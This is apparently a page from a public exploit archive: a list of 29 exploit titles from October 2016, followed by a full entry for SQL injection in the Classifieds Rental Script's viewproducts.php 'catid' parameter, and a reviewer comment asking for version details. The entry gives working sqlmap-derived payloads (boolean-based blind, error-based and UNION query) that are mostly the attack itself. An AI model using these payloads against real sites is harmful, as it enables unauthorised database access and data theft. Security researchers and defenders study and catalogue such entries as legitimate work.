
24 new exploits

NetAuctionHelp 4.1 - search.asp SQL Injection
Apple Mac OSX 10.4.11 2007-008 - i386_set_ldt System Call Local Arbitrary Code Execution
Microsoft Edge - Array.map Heap Overflow (MS16-119)
Microsoft Jet Database Engine - '.MDB' File Parsing Remote Buffer Overflow
Microsoft Edge - Array.join Info Leak (MS16-119)
Windows DeviceApi CMApi PiCMOpenDeviceKey - Arbitrary Registry Key Write Privilege Escalation (MS16-124)
Windows DeviceApi CMApi - PiCMOpenDeviceKey Arbitrary Registry Key Write Privilege Escalation (MS16-124)
HikVision Security Systems - Activex Buffer Overflow
Oracle Netbeans IDE 8.1 - Directory Traversal
MiCasa VeraLite - Remote Code Execution
Oracle BI Publisher 11.1.1.6.0 / 11.1.1.7.0 / 11.1.1.9.0 / 12.2.1.0.0 - XML External Entity Injection
Classifieds Rental Script - SQL Injection
SAP NetWeaver KERNEL 7.0 < 7.5 - Denial of Service
SAP Adaptive Server Enterprise 16 - Denial of Service
Event Calendar PHP 1.5 - SQL Injection
SPIP 3.1.2 Template Compiler/Composer - PHP Code Execution
SPIP 3.1.1 / 3.1.2 - File Enumeration / Path Traversal
SPIP 3.1.2 - Cross-Site Request Forgery
Windows win32k.sys - TTF Processing RCVT TrueType Instruction Handler Out-of-Bounds Read (MS16-120)
Windows win32k.sys - TTF Processing win32k!sbit_Embolden / win32k!ttfdCloseFontContext Use-After-Free (MS16-120)
Windows Kernel - Registry Hive Loading Negative RtlMoveMemory Size in nt!CmpCheckValueList (MS16-124)
Windows Kernel - Registry Hive Loading Relative Arbitrary Read in nt!RtlValidRelativeSecurityDescriptor (MS16-123)
Microsoft Edge - Function.apply Info Leak (MS16-119)
Microsoft Edge - Spread Operator Stack Overflow (MS16-119)
Windows Edge/IE - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118)
Windows Edge/IE - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)
Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124)
Hak5 WiFi Pineapple - Preconfiguration Command Injection (Metasploit)
OpenNMS - Java Object Unserialization Remote Code Execution (Metasploit)
# Exploit Title: SQL Injection in Classifieds Rental Script
# Date: 19 October 2016
# Exploit Author: Arbin Godar
# Website : ArbinGodar.com
# Vendor: www.i-netsolution.com

*----------------------------------------------------------------------------------------------------------------------*

# Proof of Concept SQL Injection/Exploit :
http://localhost/[PATH]/viewproducts.php?catid=PoC%27

# Exploit (using Sqlmap)
---
Parameter: catid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: catid=-1285' OR 8060=8060#

Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: catid=-9700' OR 1 GROUP BY CONCAT(0x717a627071,(SELECT (CASE WHEN (7055=7055) THEN 1 ELSE 0 END)),0x716a767871,FLOOR(RAND(0)*2)) HAVING MIN(0)#

Type: UNION query
Title: MySQL UNION query (random number) - 1 column
Payload: catid=-4664' UNION ALL SELECT CONCAT(0x717a627071,0x444c6a6547574179515a64414752636446697064764a5a64745042625072666b5954674a58484577,0x716a767871)#
---
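
Review bot: The header block (Exploit Title, Date, Exploit Author, Website, Vendor) carries no affected-version or software-link line, and the PoC URL leaves the install location as [PATH], so the entry cannot be tied to a specific release of the Classifieds Rental Script. Add a "# Version:" line and, if the vendor was contacted, a line on the fix status, so that anyone triaging the `catid` parameter of viewproducts.php can tell whether their install is covered.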